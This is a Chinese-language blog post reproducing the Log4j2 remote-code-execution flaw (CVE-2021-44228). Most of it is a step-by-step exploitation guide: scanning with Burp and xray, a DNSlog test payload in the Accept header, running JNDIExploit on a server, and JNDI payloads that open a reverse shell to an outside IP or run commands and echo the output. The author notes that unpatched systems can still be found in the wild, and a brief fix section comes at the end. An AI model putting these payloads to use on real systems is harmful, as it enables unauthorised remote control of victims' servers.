log4j漏洞复现

2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】，堪称史诗级核弹漏洞，虽然过了这么久，大部分现网中的相关漏洞已经修复，但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘，年前年后比较忙，一直没有好好的分析总结该漏洞，最近学习下刚好补上。

漏洞描述及影响
log4j是Apache的一个开源项目，是一个基于Java的日志记录框架。Log4j2是log4j的后继者，被大量用于业务系统开发，记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。Apache Log4j2 组件在开启了日志记录功能后，凡是在可触发错误记录日志的地方，插入漏洞利用代码，即可利用成功。特殊情况下，若该组件记录的日志包含其他系统的记录日志，则有可能造成间接投毒。通过中间系统，使得组件间接读取了具有攻击性的漏洞利用代码，亦可间接造成漏洞触发。

同时该漏洞还影响很多全球使用量的Top序列的通用开源组件，例如 Apache Struts2、Apache Solr、Apache Druid、Apache Flink等

复现

通过 burp 插件或 xray 等工具被动扫描出 log4j

burp 插件配置

 

   通过以上配置，走burp的流量，就会被动检测（不怎么好用）通过检测结果进行下一步操

   作 xray 配置

   xray 检测 log4j ， ssrf 等漏洞是需要尅器反链平台的，以下为反链平台开启方

法

   将 xray 上传到服务器后打开 config.yaml 修改以下

   1. 服务端配置

   启动语句 nohup ./xray_linux_amd64 reverse &

   2. 客户端配置

 扫描结果

 利用方法

验证

查看报告发现利用点在请求头的 Accept 中

 使用payload测试是否是误报 ${jndi:ldap://ffba3d51.dnslog.rest}

 

 实操

    1. 服务器上打开 JNDIExploit1.4 执行 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i

120.48.81.134

    出现以下页面为正常，如果报端口被占用，则根据端口占用情况更改端口

最下方有 jndi 详细 使用守则

  

   2. linux 通常用反弹 shell 的方式，在服务器上监听任意端口

   3. 在利用点使用

${jndi:ldap://120.48.81.134:1389/Basic/ReverseShell/120.48.81.134/1234} 将 shell

反弹到服务器上

 

    4. 或使用${jndi:ldap://120.48.81.134:1389/Basic/TomcatEcho}并在请求体写入

cmd:whoami 就会将我们输入的命令执行结果在返回包中返回

以上可以看到反弹shell，成功上线。

修复

从前面的分析验证可以看出，该漏洞可直接加载远程代码，反弹shell，危害巨大。需将log4j2的jar包升级为2.17-rc2及以上